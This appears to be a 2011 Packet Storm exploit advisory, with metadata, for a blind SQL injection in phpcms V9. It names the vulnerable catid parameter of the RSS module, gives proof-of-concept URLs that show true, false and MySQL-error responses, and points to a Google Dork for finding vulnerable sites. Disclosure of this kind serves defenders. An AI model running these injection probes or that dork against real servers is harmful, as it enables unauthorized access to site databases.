ID PACKETSTORM:97759
Type packetstorm
Reporter eidelweiss
Modified 2011-01-22T00:00:00
Description
`=================================================================
phpcms V9 BLind SQL Injection Vulnerability
=================================================================
Software: phpcms V9
Vendor: www.phpcms.cn
Vuln Type: BLind SQL Injection
Download link: http://www.phpcms.cn/2010/1229/326.html
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Google Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^
References:
http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html
=================================================================
exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
Example p0c
[!] http://host/index.php?m=content&c=rss&catid=10 <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False
[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
=================================================================
Nothing Impossible In This World Even Nobody`s Perfect
=================================================================
=========================| -=[ E0F ]=- |=========================
`
{"type": "packetstorm", "published": "2011-01-22T00:00:00", "reporter": "eidelweiss", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d6225f1a1e4f3573d0229d24ffb73a1d"}, {"key": "modified", "hash": "87e65000aef76a2b49050812e24805d9"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "87e65000aef76a2b49050812e24805d9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8145df0cd4aa1186bea9b50ece958a4b"}, {"key": "sourceData", "hash": "42871a3cd29de9b9d1392a236bdceba5"}, {"key": "sourceHref", "hash": "a2a1ff8151534306bf25c43d7dae0a41"}, {"key": "title", "hash": "38efde8412baf342a34989bb889a3e80"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`================================================================= \nphpcms V9 BLind SQL Injection Vulnerability \n================================================================= \n \nSoftware: phpcms V9 \nVendor: www.phpcms.cn \nVuln Type: BLind SQL Injection \nDownload link: http://www.phpcms.cn/2010/1229/326.html \nAuthor: eidelweiss \ncontact: eidelweiss[at]windowslive[dot]com \nHome: www.eidelweiss.info \n \nGoogle Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^ \n \nReferences: \nhttp://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html \n \n================================================================= \n \nexploit & p0c \n \n[!] index.php?m=content&c=rss&catid=[valid catid] \n \nExample p0c \n \n[!] http://host/index.php?m=content&c=rss&catid=10 <= True \n[!] http://host/index.php?m=content&c=rss&catid=-10 <= False \n \n[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table) \n \n================================================================= \n \nNothing Impossible In This World Even Nobody`s Perfect \n \n================================================================= \n \n=========================| -=[ E0F ]=- |========================= \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:28:03", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/97759/PHP-CMS-9-Blind-SQL-Injection.html", "sourceHref": "https://packetstormsecurity.com/files/download/97759/phpcms9-sql.txt", "title": "PHP CMS 9 Blind SQL Injection", "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-11-03T10:28:03"}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:03"}, "vulnersScore": 0.3}, "references": [], "id": "PACKETSTORM:97759", "hash": "4df31e961422b1fcb394bd5348550d97592863f825f4b9801b66bfcc426939d0", "edition": 1, "cvelist": [], "modified": "2011-01-22T00:00:00", "description": ""}
{}